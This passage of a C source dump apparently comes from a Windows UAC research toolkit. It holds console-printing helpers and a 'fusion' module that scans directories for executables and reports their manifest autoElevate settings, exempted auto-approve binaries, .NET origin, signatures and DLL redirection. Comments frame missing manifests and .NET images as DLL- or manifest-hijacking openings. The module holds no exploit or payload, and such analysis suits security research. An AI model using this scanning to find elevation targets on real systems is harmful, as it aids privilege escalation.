if (bufferSize > MAX_CONSOLE_OUTPUT)
return;
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);
if (Buffer) {
copySize = min(bufferSize - 1, consoleIO);
memcpy(Buffer, lpText, copySize);
Buffer[copySize] = '\0';
if (UseReturn) _strcat_a(Buffer, "\r\n");
consoleIO = _strlen_a(Buffer);
if (g_ConsoleOutput != FALSE) {
writeSuccess = WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* cuiPrintTextW
*
* Purpose:
*
* Output text to the console or file.
* UNICODE version.
*
*/
VOID cuiPrintTextW(
_In_ LPWSTR lpText,
_In_ BOOL UseReturn
)
{
BOOL writeSuccess;
DWORD bytesIO;
SIZE_T consoleIO, bufferSize, copySize;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen_w(lpText);
if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT)
return;
if (UseReturn) {
bufferSize = (consoleIO + 3) * sizeof(WCHAR);
}
else {
bufferSize = (consoleIO + 1) * sizeof(WCHAR);
}
if (bufferSize > MAX_CONSOLE_OUTPUT * sizeof(WCHAR))
return;
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);
if (Buffer) {
copySize = min(bufferSize / sizeof(WCHAR) - 1, consoleIO);
memcpy(Buffer, lpText, copySize * sizeof(WCHAR));
Buffer[copySize] = L'\0';
if (UseReturn) _strcat_w(Buffer, TEXT("\r\n"));
consoleIO = _strlen_w(Buffer);
if (g_ConsoleOutput != FALSE) {
writeSuccess = WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* cuiPrintTextLastErrorA
*
* Purpose:
*
* Output LastError translated code to the console or file.
* ANSI version.
*
*/
VOID cuiPrintTextLastErrorA(
_In_ BOOL UseReturn
)
{
CHAR szTextBuffer[1024];
DWORD dwLastError = GetLastError();
RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer));
if (FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT,
(LPSTR)&szTextBuffer, sizeof(szTextBuffer) - 64, NULL) == 0)
{
_strcpy_a(szTextBuffer, "Error code: ");
itostr_a(dwLastError, _strend_a(szTextBuffer));
}
cuiPrintTextA(szTextBuffer, UseReturn);
}
/*
* cuiPrintTextLastErrorW
*
* Purpose:
*
* Output LastError translated code to the console or file.
* UNICODE version.
*
*/
VOID cuiPrintTextLastErrorW(
_In_ BOOL UseReturn
)
{
WCHAR szTextBuffer[1024];
DWORD dwLastError = GetLastError();
RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer));
if (FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT,
(LPWSTR)&szTextBuffer, (sizeof(szTextBuffer) / sizeof(WCHAR)) - 64, NULL) == 0)
{
_strcpy_w(szTextBuffer, TEXT("Error code: "));
itostr_w(dwLastError, _strend_w(szTextBuffer));
}
cuiPrintTextW(szTextBuffer, UseReturn);
}
================================================
FILE: Source/Yuubari/cui.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2018
*
* TITLE: CUI.H
*
* VERSION: 1.30
*
* DATE: 01 Aug 2018
*
* Common header file for console ui.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
VOID cuiInitialize(
_In_ BOOL InitInput,
_Out_opt_ PBOOL IsConsoleOutput
);
#ifdef _UNICODE
#define cuiPrintText cuiPrintTextW
#define cuiPrintTextLastError cuiPrintTextLastErrorW
#else
#define cuiPrintText cuiPrintTextA
#define cuiPrintTextLastError cuiPrintTextLastErrorA
#endif
VOID cuiPrintTextA(
_In_ LPSTR lpText,
_In_ BOOL UseReturn
);
VOID cuiPrintTextW(
_In_ LPWSTR lpText,
_In_ BOOL UseReturn
);
VOID cuiPrintTextLastErrorA(
_In_ BOOL UseReturn
);
VOID cuiPrintTextLastErrorW(
_In_ BOOL UseReturn
);
VOID cuiClrScr(
VOID
);
================================================
FILE: Source/Yuubari/fusion.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2026
*
* TITLE: FUSION.C
*
* VERSION: 1.61
*
* DATE: 12 Feb 2026
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
ptrWTGetSignatureInfo WTGetSignatureInfo = NULL;
/*
* IsExemptedAutoApproveEXE
*
* Purpose:
*
* Check if the given file is Exempted AutoApprove EXE.
*
*/
BOOLEAN IsExemptedAutoApproveEXE(
_In_ LPWSTR lpFileName,
_In_ HANDLE hFile)
{
SIGNATURE_INFO sigData;
NTSTATUS status;
LPWSTR lpName = _filename(lpFileName);
if ((_strcmpi(lpName, L"sysprep.exe") == 0) ||
(_strcmpi(lpName, L"inetmgr.exe") == 0))
{
RtlSecureZeroMemory(&sigData, sizeof(sigData));
sigData.cbSize = sizeof(sigData);
status = WTGetSignatureInfo(lpFileName, hFile,
SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED,
&sigData,
NULL, NULL);
if (NT_SUCCESS(status))
return ((sigData.SignatureState == SIGNATURE_STATE_VALID) && (sigData.fOSBinary != FALSE));
}
return FALSE;
}
/*
* SxsGetTocHeaderFromActivationContext
*
* Purpose:
*
* Locate and return pointer to Toc header in activation context.
*
*/
NTSTATUS SxsGetTocHeaderFromActivationContext(
_In_ PACTIVATION_CONTEXT ActivationContext,
_Out_ PACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader,
_Out_opt_ PACTIVATION_CONTEXT_DATA* ActivationContextData
)
{
NTSTATUS result = STATUS_UNSUCCESSFUL;
ACTIVATION_CONTEXT_DATA* ContextData = NULL;
ACTIVATION_CONTEXT_DATA_TOC_HEADER* Header;
WCHAR szLog[0x100];
if (ActivationContext == NULL)
return STATUS_INVALID_PARAMETER_1;
if (TocHeader == NULL)
return STATUS_INVALID_PARAMETER_2;
__try {
do {
RtlSecureZeroMemory(szLog, sizeof(szLog));
ContextData = ActivationContext->ActivationContextData;
if (ContextData->Magic != ACTIVATION_CONTEXT_DATA_MAGIC) {
wsprintf(szLog, TEXT("ActivationContext Magic = %lx invalid"), ContextData->Magic);
break;
}
if (
(ContextData->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA)) ||
(ContextData->HeaderSize > ContextData->TotalSize)
)
{
wsprintf(szLog, TEXT("Unexpected data HeaderSize = %lu"), ContextData->HeaderSize);
break;
}
if (ContextData->DefaultTocOffset > ContextData->TotalSize) {
wsprintf(szLog, TEXT("Unexpected Toc offset %lx"), ContextData->DefaultTocOffset);
break;
}
Header = (ACTIVATION_CONTEXT_DATA_TOC_HEADER*)(((LPBYTE)ContextData) + ContextData->DefaultTocOffset);
if (Header->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA_TOC_HEADER)) {
wsprintf(szLog, TEXT("Unexpected Toc HeaderSize %lu"), Header->HeaderSize);
break;
}
if ((Header->FirstEntryOffset != 0) && (Header->EntryCount == 0)) {
wsprintf(szLog, TEXT("Unexpected EntryCount %lu"), Header->EntryCount);
break;
}
if ((Header->EntryCount > 0) && (Header->FirstEntryOffset == 0)) {
wsprintf(szLog, TEXT("Unexpected Toc FirstEntryOffset %lu"), Header->FirstEntryOffset);
break;
}
if (Header->FirstEntryOffset > ContextData->TotalSize) {
wsprintf(szLog, TEXT("Toc FirstEntry offset = %lu invalid"), Header->FirstEntryOffset);
break;
}
*TocHeader = Header;
if (ActivationContextData != NULL)
*ActivationContextData = ContextData;
result = STATUS_SUCCESS;
} while (FALSE);
if (!NT_SUCCESS(result)) {
OutputDebugString(szLog);
return STATUS_SXS_CORRUPTION;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
return STATUS_SXS_CORRUPTION;
}
return result;
}
/*
* SxsAllocInitUnicodeString
*
* Purpose:
*
* Allocates a buffer, copies a UNICODE string from the specified offset and length
* of a section header, and initializes a UNICODE_STRING structure.
*
*/
NTSTATUS SxsAllocInitUnicodeString(
_In_ LPVOID SectionHeader,
_In_ SIZE_T Offset,
_In_ SIZE_T Length,
_Out_ UNICODE_STRING* Destination
)
{
WCHAR* Buffer;
if (!Destination || !SectionHeader || !Length)
return STATUS_INVALID_PARAMETER;
//
// Allocate memory for string with space for NULL-terminator.
//
Buffer = (WCHAR*)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Length + sizeof(UNICODE_NULL));
if (!Buffer)
return STATUS_NO_MEMORY;
__try {
RtlCopyMemory(
Buffer,
(PBYTE)SectionHeader + Offset,
Length
);
RtlInitUnicodeString(Destination, Buffer);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);
return STATUS_SXS_CORRUPTION;
}
return STATUS_SUCCESS;
}
/*
* SxsGetStringSectionRedirectionDlls
*
* Purpose:
*
* Extracts redirection DLLs from a string section entry and populates a DLL redirection list.
*
*/
NTSTATUS SxsGetStringSectionRedirectionDlls(
_In_ ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader,
_In_ ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry,
_Inout_ PDLL_REDIRECTION_LIST DllList
)
{
ULONG SegmentIndex;
NTSTATUS result = STATUS_SXS_KEY_NOT_FOUND, status;
DLL_REDIRECTION_LIST_ENTRY* DllListEntry;
ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT* DllPathSegment;
ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION* DataDll;
if (!DllList)
return result;
__try {
DataDll = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION*)(((LPBYTE)SectionHeader) + StringEntry->Offset);
if (!DataDll || !DataDll->PathSegmentOffset || DataDll->PathSegmentCount == 0)
return result;
DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)(((LPBYTE)SectionHeader) + DataDll->PathSegmentOffset);
for (SegmentIndex = 0; SegmentIndex < DataDll->PathSegmentCount; SegmentIndex++) {
if (DllPathSegment && DllPathSegment->Length && DllPathSegment->Offset) {
DllListEntry = (DLL_REDIRECTION_LIST_ENTRY*)
RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof(DLL_REDIRECTION_LIST_ENTRY));
if (DllListEntry) {
status = SxsAllocInitUnicodeString(
SectionHeader,
StringEntry->KeyOffset,
StringEntry->KeyLength,
&DllListEntry->KeyName);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry);
if (status == STATUS_SXS_CORRUPTION)
return status;
continue;
}
status = SxsAllocInitUnicodeString(
SectionHeader,
DllPathSegment->Offset,
DllPathSegment->Length,
&DllListEntry->DllName);
if (!NT_SUCCESS(status)) {
RtlFreeUnicodeString(&DllListEntry->KeyName);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry);
if (status == STATUS_SXS_CORRUPTION)
return status;
continue;
}
RtlInterlockedPushEntrySList(&DllList->Header, &DllListEntry->ListEntry);
}
}
DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)
(((LPBYTE)DllPathSegment) + sizeof(ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT));
}
result = STATUS_SUCCESS;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
return STATUS_SXS_CORRUPTION;
}
return result;
}
/*
* SxsGetDllRedirectionFromActivationContext
*
* Purpose:
*
* Query redirection dll list from activation context data.
*
*/
NTSTATUS SxsGetDllRedirectionFromActivationContext(
_In_ PACTIVATION_CONTEXT ActivationContext,
_In_ PDLL_REDIRECTION_LIST DllList
)
{
ULONG i, j;
NTSTATUS result = STATUS_UNSUCCESSFUL, status;
ACTIVATION_CONTEXT_DATA* ContextData = NULL;
ACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader = NULL;
ACTIVATION_CONTEXT_DATA_TOC_ENTRY* TocEntry = NULL;
ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader = NULL;
ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry = NULL;
WCHAR szLog[0x100];
__try {
if (ActivationContext == NULL)
return STATUS_INVALID_PARAMETER_1;
if (DllList == NULL)
return STATUS_INVALID_PARAMETER_2;
do {
if (!NT_SUCCESS(SxsGetTocHeaderFromActivationContext(ActivationContext, &TocHeader, &ContextData)))
break;
TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)ContextData) + TocHeader->FirstEntryOffset);
RtlInitializeSListHead(&DllList->Header);
i = 1;
while (i < TocHeader->EntryCount) {
if (TocEntry->Format == ACTIVATION_CONTEXT_SECTION_FORMAT_STRING) {
SectionHeader = (ACTIVATION_CONTEXT_STRING_SECTION_HEADER*)(((LPBYTE)ContextData) + TocEntry->Offset);
if (SectionHeader->Magic != ACTIVATION_CONTEXT_STRING_SECTION_MAGIC) {
wsprintf(szLog, TEXT("Section Magic = %lx invalid"), SectionHeader->Magic);
OutputDebugString(szLog);
break;
}
if (SectionHeader->HeaderSize != sizeof(ACTIVATION_CONTEXT_STRING_SECTION_HEADER)) {
wsprintf(szLog, TEXT("Unexpected Section HeaderSize = %lu"), SectionHeader->HeaderSize);
OutputDebugString(szLog);
break;
}
if (TocEntry->Id == ACTIVATION_CONTEXT_SECTION_DLL_REDIRECTION) {
StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)SectionHeader) + SectionHeader->ElementListOffset);
status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList);
if (status == STATUS_SXS_CORRUPTION)
continue;
for (j = 1; j < SectionHeader->ElementCount; j++) {
StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)StringEntry) + sizeof(ACTIVATION_CONTEXT_STRING_SECTION_ENTRY));
status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList);
if (status == STATUS_SXS_CORRUPTION)
continue;
}
}
}
TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)TocEntry) + sizeof(ACTIVATION_CONTEXT_DATA_TOC_ENTRY));
i += 1;
} //while (i < TocHeader->EntryCount)
DllList->Depth = RtlQueryDepthSList(&DllList->Header);
result = (DllList->Depth == 0) ? STATUS_SXS_SECTION_NOT_FOUND : STATUS_SUCCESS;
} while (FALSE);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
return STATUS_SXS_CORRUPTION;
}
return result;
}
/*
* FusionProbeForRedirectedDlls
*
* Purpose:
*
* Probe activation context for redirection dlls and output them if found.
*
*/
NTSTATUS FusionProbeForRedirectedDlls(
_In_ LPWSTR lpFileName,
_In_ ACTIVATION_CONTEXT* ActivationContext,
_In_ OUTPUTCALLBACK OutputCallback
)
{
NTSTATUS status;
SLIST_ENTRY* ListEntry = NULL;
DLL_REDIRECTION_LIST_ENTRY* DllData = NULL;
UAC_FUSION_DATA_DLL FusionRedirectedDll;
DLL_REDIRECTION_LIST DllList;
__try {
RtlSecureZeroMemory(&DllList, sizeof(DllList));
status = SxsGetDllRedirectionFromActivationContext(ActivationContext, &DllList);
if (NT_SUCCESS(status)) {
while (DllList.Depth) {
ListEntry = RtlInterlockedPopEntrySList(&DllList.Header);
if (ListEntry) {
DllData = (PDLL_REDIRECTION_ENTRY)ListEntry;
RtlSecureZeroMemory(&FusionRedirectedDll, sizeof(FusionRedirectedDll));
FusionRedirectedDll.DataType = UacFusionDataRedirectedDllType;
FusionRedirectedDll.FileName = lpFileName;
FusionRedirectedDll.KeyName = DllData->KeyName.Buffer;
FusionRedirectedDll.DllName = DllData->DllName.Buffer;
OutputCallback((PVOID)&FusionRedirectedDll);
RtlFreeUnicodeString(&DllData->DllName);
RtlFreeUnicodeString(&DllData->KeyName);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllData);
}
DllList.Depth--;
}
RtlInterlockedFlushSList(&DllList.Header);
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
return STATUS_SXS_CORRUPTION;
}
return status;
}
/*
* FusionCheckFile
*
* Purpose:
*
* Query file manifest data related to security.
*
*/
VOID FusionCheckFile(
_In_ LPWSTR lpDirectory,
_In_ WIN32_FIND_DATA* fdata,
_In_ OUTPUTCALLBACK OutputCallback
)
{
DWORD lastError;
NTSTATUS status;
HANDLE hFile = NULL, hSection = NULL, hActCtx = INVALID_HANDLE_VALUE;
LPWSTR FileName = NULL, pt = NULL;
PBYTE DllBase = NULL;
SIZE_T DllVirtualSize, sz, l;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING usFileName;
IO_STATUS_BLOCK iosb;
ULONG_PTR ResourceSize = 0;
ULONG_PTR IdPath[3];
ACTCTX ctx;
SIGNATURE_INFO sigData;
UAC_FUSION_DATA FusionCommonData;
ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION ctxrl;
WCHAR szValue[100];
usFileName.Buffer = NULL;
do {
if ((lpDirectory == NULL) || (fdata == NULL))
break;
if (fdata->dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
break;
sz = (_strlen(lpDirectory) + _strlen(fdata->cFileName) + 2) * sizeof(WCHAR); // +2 for NULL and possible '\'
sz = ALIGN_UP_BY(sz, PAGE_SIZE);
FileName = (LPWSTR)VirtualAlloc(NULL, sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (FileName == NULL)
break;
pt = FileName;
_strcpy(FileName, lpDirectory);
l = _strlen(FileName);
if (pt[l - 1] != L'\\') {
pt[l] = L'\\';
pt[l + 1] = 0;
}
if (l + _strlen(fdata->cFileName) < sz / sizeof(WCHAR)) {
_strcat(FileName, fdata->cFileName);
}
else {
break; // Path too long, skip this file
}
if (RtlDosPathNameToNtPathName_U(FileName, &usFileName, NULL, NULL) == FALSE)
break;
InitializeObjectAttributes(&attr, &usFileName,
OBJ_CASE_INSENSITIVE, NULL, NULL);
RtlSecureZeroMemory(&iosb, sizeof(iosb));
//
// Open file and map it.
//
status = NtCreateFile(&hFile, SYNCHRONIZE | FILE_READ_DATA,
&attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN,
FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (!NT_SUCCESS(status))
break;
status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
NULL, PAGE_READONLY, SEC_IMAGE, hFile);
if (!NT_SUCCESS(status))
break;
DllBase = NULL;
DllVirtualSize = 0;
status = NtMapViewOfSection(hSection, NtCurrentProcess(), (PVOID*)&DllBase,
0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY);
if (!NT_SUCCESS(status))
break;
RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));
FusionCommonData.Name = FileName;
//
// Look for embedded manifest resource
//
IdPath[0] = (ULONG_PTR)RT_MANIFEST;
IdPath[1] = (ULONG_PTR)CREATEPROCESS_MANIFEST_RESOURCE_ID;
IdPath[2] = 0;
status = LdrResSearchResource(DllBase, (ULONG_PTR*)&IdPath, 3, 0,
(LPVOID*)&pt, (ULONG_PTR*)&ResourceSize, NULL, NULL);
FusionCommonData.IsFusion = NT_SUCCESS(status);
//
// File has no manifest embedded.
//
if (FusionCommonData.IsFusion == FALSE) {
switch (status) {
case STATUS_RESOURCE_TYPE_NOT_FOUND:
OutputDebugString(TEXT("LdrResSearchResource: resource type not found\r\n"));
break;
case STATUS_RESOURCE_DATA_NOT_FOUND:
OutputDebugString(TEXT("LdrResSearchResource: resource data not found\r\n"));
break;
case STATUS_RESOURCE_NAME_NOT_FOUND:
OutputDebugString(TEXT("LdrResSearchResource: resource name not found\r\n"));
break;
default:
break;
}
//
// No embedded manifest, possible manifest hijacking for versions below RS1
//
if (
(status == STATUS_RESOURCE_TYPE_NOT_FOUND) ||
(status == STATUS_RESOURCE_DATA_NOT_FOUND) ||
(status == STATUS_RESOURCE_NAME_NOT_FOUND)
) {
if (WTGetSignatureInfo != NULL) {
//
// Check if file is signed as part of an operation system
//
RtlSecureZeroMemory(&sigData, sizeof(sigData));
sigData.cbSize = sizeof(sigData);
status = WTGetSignatureInfo(FileName, hFile,
SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED,
&sigData,
NULL, NULL);
if (NT_SUCCESS(status)) {
if (sigData.fOSBinary != FALSE) {
RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));
FusionCommonData.Name = FileName;
FusionCommonData.IsOSBinary = TRUE;
//
// Check if signature valid or trusted
//
FusionCommonData.IsSignatureValidOrTrusted = ((sigData.SignatureState == SIGNATURE_STATE_TRUSTED) ||
(sigData.SignatureState == SIGNATURE_STATE_VALID));
OutputCallback((PVOID)&FusionCommonData);
}
}
}
else { //WTGetSignatureInfo != NULL
//
// On Windows 7 this API is not available, just output result.
//
RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));
FusionCommonData.Name = FileName;
OutputCallback((PVOID)&FusionCommonData);
}
}
//break the global loop
break;
}
//
// File has manifest, create activation context for it.
//
RtlSecureZeroMemory(&ctx, sizeof(ctx));
ctx.cbSize = sizeof(ACTCTX);
ctx.dwFlags = ACTCTX_FLAG_RESOURCE_NAME_VALID | ACTCTX_FLAG_HMODULE_VALID;
ctx.lpResourceName = CREATEPROCESS_MANIFEST_RESOURCE_ID;
ctx.lpSource = FileName;
ctx.hModule = (HMODULE)DllBase;
hActCtx = CreateActCtx(&ctx);
if (hActCtx == INVALID_HANDLE_VALUE) {
lastError = GetLastError();
RtlSecureZeroMemory(szValue, sizeof(szValue));
_strcpy(szValue, TEXT("Unexpected activation context failure ="));
ultostr(lastError, _strend(szValue));
_strcat(szValue, TEXT("\r\n"));
OutputDebugString(szValue);
break;
}
//
// Query run level and uiAccess information.
//
RtlSecureZeroMemory(&ctxrl, sizeof(ctxrl));
status = RtlQueryInformationActivationContext(RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF,
(PCACTIVATION_CONTEXT)hActCtx,
NULL,
RunlevelInformationInActivationContext,
(PVOID)&ctxrl,
sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION),
NULL);
if (NT_SUCCESS(status)) {
RtlCopyMemory(&FusionCommonData.RunLevel, &ctxrl, sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION));
}
//
// DotNet application highly vulnerable for Dll Hijacking attacks.
// Always check if file is DotNet origin.
//
FusionCommonData.IsDotNet = supIsCorImageFile(DllBase);
//
// Query autoelevate setting.
//
l = 0;
RtlSecureZeroMemory(&szValue, sizeof(szValue));
status = RtlQueryActivationContextApplicationSettings(0, hActCtx, NULL, TEXT("autoElevate"), (PWSTR)&szValue, sizeof(szValue), &l);
if (NT_SUCCESS(status)) {
//
// Actually appinfo only looks for 'T' or 't' symbol
// for performance reasons perhaps
//
if (_strcmpi(szValue, TEXT("true")) == 0)
FusionCommonData.AutoElevateState = AutoElevateEnabled;
else
//
// Several former autoelevate applications has autoelevated strictly
// disabled in manifest as part of their UAC fixes.
//
if (_strcmpi(szValue, TEXT("false")) == 0)
FusionCommonData.AutoElevateState = AutoElevateDisabled;
}
else {
//
// Check specific "exempted" autoelevated files, they may not have "autoelevate" in manifest.
//
if (IsExemptedAutoApproveEXE(FileName, hFile)) {
FusionCommonData.AutoElevateState = AutoElevateExempted;
}
//
// Query settings failed, check if it known error like sxs key not exist.
//
if (status != STATUS_SXS_KEY_NOT_FOUND) {
RtlSecureZeroMemory(szValue, sizeof(szValue));
_strcpy(szValue, TEXT("QueryActivationContext error ="));
ultostr(status, _strend(szValue));
_strcat(szValue, TEXT("\r\n"));
OutputDebugString(szValue);
//
// Don't output anything, just break, it is unexpected situation.
//
break;
}
}
//
// Even if autoElevate key could be not found, application still can be in whitelist.
// As in case of inetmgr.exe on RS1+, so check if it has redirection dlls.
//
OutputCallback((PVOID)&FusionCommonData);
//
// Print redirection dlls from activation context
//
FusionProbeForRedirectedDlls(FileName, (PACTIVATION_CONTEXT)hActCtx, OutputCallback);
} while (FALSE);
if (hActCtx != INVALID_HANDLE_VALUE)
ReleaseActCtx(hActCtx);
if (usFileName.Buffer != NULL)
RtlFreeUnicodeString(&usFileName);
if (DllBase != NULL)
NtUnmapViewOfSection(NtCurrentProcess(), DllBase);
if (hSection != NULL)
NtClose(hSection);
if (hFile != NULL)
NtClose(hFile);
if (FileName != NULL)
VirtualFree(FileName, 0, MEM_RELEASE);
}
/*
* FusionScanFiles
*
* Purpose:
*
* Scan directory for files of given type.
*
*/
VOID FusionScanFiles(
_In_ LPWSTR lpDirectory,
_In_ OUTPUTCALLBACK OutputCallback
)
{
HANDLE hFile;
LPWSTR lpLookupDirectory = NULL;
SIZE_T sz;
WIN32_FIND_DATA fdata;
sz = (_strlen(lpDirectory) + MAX_PATH) * sizeof(WCHAR);
lpLookupDirectory = (LPWSTR)supHeapAlloc(sz);
if (lpLookupDirectory) {
_strncpy(lpLookupDirectory, MAX_PATH, lpDirectory, MAX_PATH);
_strcat(lpLookupDirectory, TEXT("\\*.exe"));
hFile = FindFirstFile(lpLookupDirectory, &fdata);
if (hFile != INVALID_HANDLE_VALUE) {
do {
FusionCheckFile(lpDirectory, &fdata, OutputCallback);
} while (FindNextFile(hFile, &fdata));
FindClose(hFile);
}
supHeapFree(lpLookupDirectory);
}
}
/*
* FusionScanDirectory
*
* Purpose:
*
* Recursively scan directories.
*
*/
VOID FusionScanDirectory(
_In_ LPWSTR lpDirectory,
_In_ OUTPUTCALLBACK OutputCallback
)
{
SIZE_T cchBuffer;
HANDLE hDirectory;
LPWSTR lpFilePath;
WIN32_FIND_DATA fdata;
FusionScanFiles(lpDirectory, OutputCallback);
cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);
lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
if (lpFilePath) {
_strcpy(lpFilePath, lpDirectory);
supConcatenatePaths(lpFilePath, L"*", cchBuffer);
hDirectory = FindFirstFile(lpFilePath, &fdata);
if (hDirectory != INVALID_HANDLE_VALUE) {
do {
if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
(fdata.cFileName[0] != L'.')
)
{
_strcpy(lpFilePath, lpDirectory);
supConcatenatePaths(lpFilePath, fdata.cFileName, cchBuffer);
FusionScanDirectory(lpFilePath, OutputCallback);
}
} while (FindNextFile(hDirectory, &fdata));
FindClose(hDirectory);
}
supHeapFree(lpFilePath);
}
}
================================================
FILE: Source/Yuubari/fusion.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2026
*
* TITLE: FUSION.H
*
* VERSION: 1.61
*
* DATE: 12 Feb 2026
*
* Header file for the autoelevated applications scan.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#define UacFusionDataCommonType 0
#define UacFusionDataRedirectedDllType 1
typedef enum {
AutoElevateUnspecified = 0,
AutoElevateDisabled = 1,
AutoElevateEnabled = 2,
AutoElevateExempted = 3
} AUTOELEVATESTATE;
typedef struct _UAC_FUSION_DATA {
DWORD DataType;
LPWSTR Name;
ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION RunLevel;
AUTOELEVATESTATE AutoElevateState;
BOOL IsFusion;
BOOL IsDotNet;
BOOL IsOSBinary;
BOOL IsSignatureValidOrTrusted;
} UAC_FUSION_DATA, *PUAC_FUSION_DATA;
typedef struct _UAC_FUSION_DATA_DLL {
DWORD DataType;
LPWSTR FileName;
LPWSTR KeyName;
LPWSTR DllName;
} UAC_FUSION_DATA_DLL, *PUAC_FUSION_DATA_DLL;
typedef struct _DLL_REDIRECTION_LIST_ENTRY {
SLIST_ENTRY ListEntry;
//For release RtlFreeUnicodeString used, Buffer of both allocated in Process Heap
UNICODE_STRING KeyName;
UNICODE_STRING DllName;
} DLL_REDIRECTION_LIST_ENTRY, *PDLL_REDIRECTION_ENTRY;
typedef struct _DLL_REDIRECTION_LIST {
SLIST_HEADER Header;
ULONG Depth;
} DLL_REDIRECTION_LIST, *PDLL_REDIRECTION_LIST;
NTSTATUS SxsGetDllRedirectionFromActivationContext(
_In_ PACTIVATION_CONTEXT ActivationContext,
_In_ PDLL_REDIRECTION_LIST DllList);
